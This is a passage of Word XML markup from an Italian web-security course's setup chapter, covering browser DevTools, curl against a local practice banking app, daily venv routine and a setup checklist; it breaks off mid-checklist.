        <w:t xml:space="preserve">I browser moderni (Chrome, Edge, Firefox) hanno integrato un set di strumenti per sviluppatori chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DevTools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo useremo costantemente nei capitoli su XSS, IDOR e CSRF per:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vedere quali richieste HTTP il browser invia al server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ispezionare e modificare l’HTML della pagina</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">leggere e cambiare i cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">scrivere ed eseguire JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al volo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per aprire i DevTools:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Chrome/Edge:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">premi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">F12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oppure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Shift + I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(su Mac:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd + Option + I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Firefox:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stessi tasti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si apre un pannello (di solito a destra o in basso) con diverse schede:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Elements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(HTML),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(JavaScript),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(richieste HTTP),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cookie, storage),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(file caricati). Le useremo a tempo debito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chrome con DevTools aperti su BancaPiccola, scheda Network visibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3099206"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_09_Chrome_con_DevTools_aperti_su_BancaPiccola_scheda_Network_vi.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3099206"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="curl"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un programma a riga di comando per inviare richieste HTTP senza usare un browser. Negli attacchi è praticissimo perché ti permette di costruire richieste personalizzate (con qualunque parametro, intestazione, cookie) e vedere esattamente cosa risponde il server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows 10/11:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">curl è già installato di serie. Verifica con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su macOS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">anche qui è già installato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio rapido — quando BancaPiccola è in esecuzione, prova:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai stampato l’HTML grezzo della pagina di login. Sembra inutile adesso, ma quando vorrai testare una vulnerabilità inviando dati specifici sarà fondamentale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="la-routine-quotidiana-di-lavoro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="sec_0_12"/>
      <w:r>
        <w:t xml:space="preserve">0.12 La routine quotidiana di lavoro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso che tutto è installato, ecco i passi che dovrai ripetere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ogni volta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ti siedi a lavorare sul corso. Memorizzali, sono cinque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Apri VS Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e apri la cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Menu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File → Apri cartella recente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Apri il terminale integrato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + ò</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Windows,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Mac).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attiva l’ambiente virtuale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.\venv\Scripts\Activate.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">macOS/Linux:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">source venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che davanti al prompt compaia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Spostati nella cartella del progetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su cui stai lavorando (es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per i lab).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lancia l’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) oppure il comando del laboratorio del giorno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando hai finito:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ferma il server con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chiudi VS Code (l’ambiente virtuale si disattiva automaticamente).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="checklist-finale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="sec_0_13"/>
      <w:r>
        <w:t xml:space="preserve">0.13 Checklist finale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prima di passare al </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, verifica una per una queste righe. Se ne fallisce anche solo una,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non andare avanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: torna alla sezione corrispondente di questo capitolo e sistema il problema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mostra Python 3.12 o superiore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ So aprire il terminale del mio sistema operativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ So usare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per muovermi tra le cartelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ VS Code è installato e ho aperto almeno una volta la cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Le estensioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLite Viewer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono installate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Ho creato un ambiente virtuale chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ So attivare l’ambiente virtuale e riconosco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(venv)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Ho installato Flask con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Ho fatto girare il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">primo_sito.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e visto la pagina nel browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ DB Browser for SQLite è installato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Git è installato (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risponde)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Ho scaricato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
